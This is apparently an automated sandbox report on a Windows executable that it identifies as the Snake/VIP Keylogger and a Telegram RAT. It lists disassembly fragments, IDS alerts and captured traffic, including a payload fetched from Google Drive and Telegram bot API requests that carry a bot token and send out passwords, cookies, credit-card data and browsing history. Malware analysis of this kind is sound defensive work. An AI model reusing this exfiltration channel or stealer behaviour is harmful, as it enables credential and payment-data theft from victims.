Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380FE8A2h	12_2_380FE5A8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F4FA1h	12_2_380F4CA8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F1570h	12_2_380F12A0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380FBD99h	12_2_380FBAA0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380FA5B1h	12_2_380FA2B8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F62C1h	12_2_380F5FC8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F3598h	12_2_380F32C8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380FFBC1h	12_2_380FF8C8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380FD0B9h	12_2_380FCDC0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F07A8h	12_2_380F04D8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380FB8D1h	12_2_380FB5D8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F1EA0h	12_2_380F1BD0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F8DC9h	12_2_380F8AD0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F75E1h	12_2_380F72E8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380FE3D9h	12_2_380FE0E0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F3EC8h	12_2_380F3BF8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380FCBF1h	12_2_380FC8F8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380FA0E9h	12_2_380F9DF0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then add dword ptr [ebp-0Ch], 01h	12_2_3811C0B8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	12_2_3811FAB8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	12_2_3811FAAE
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38120339h	12_2_38120040

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20and%20Time:%2008/03/2025%20/%2019:00:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841675%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=744079942&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5ef2e8206767Host: api.telegram.orgContent-Length: 582
Source: global traffic	HTTP traffic detected: POST /bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=744079942&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5f1a7d0f69c8Host: api.telegram.orgContent-Length: 742
Source: global traffic	HTTP traffic detected: POST /bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=744079942&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACreditCard%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5f45bd19a0d5Host: api.telegram.orgContent-Length: 598Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=744079942&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ADownloads%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5f79cbeac367Host: api.telegram.orgContent-Length: 596Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=744079942&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0AHistory%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5fb00e832d02Host: api.telegram.orgContent-Length: 592Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=744079942&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ATopSites%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5fe73a8a400cHost: api.telegram.orgContent-Length: 941Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=744079942&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0AAutoFill%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd602ac456f2b6Host: api.telegram.orgContent-Length: 594Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=744079942&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0AInstalled%20Softwares%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd60976c69a7f8Host: api.telegram.orgContent-Length: 973Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=744079942&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0AInstalled%20Browsers%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd60ef14f4b094Host: api.telegram.orgContent-Length: 975Connection: Keep-Alive

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49712 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49709 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49719 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49711 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49707 -> 142.250.185.142:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1XPI1EXGrpy_hlaI5KpuYvokgvS_MVIXw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1XPI1EXGrpy_hlaI5KpuYvokgvS_MVIXw&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CWu89IbJQw.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
CWu89IbJQw.exe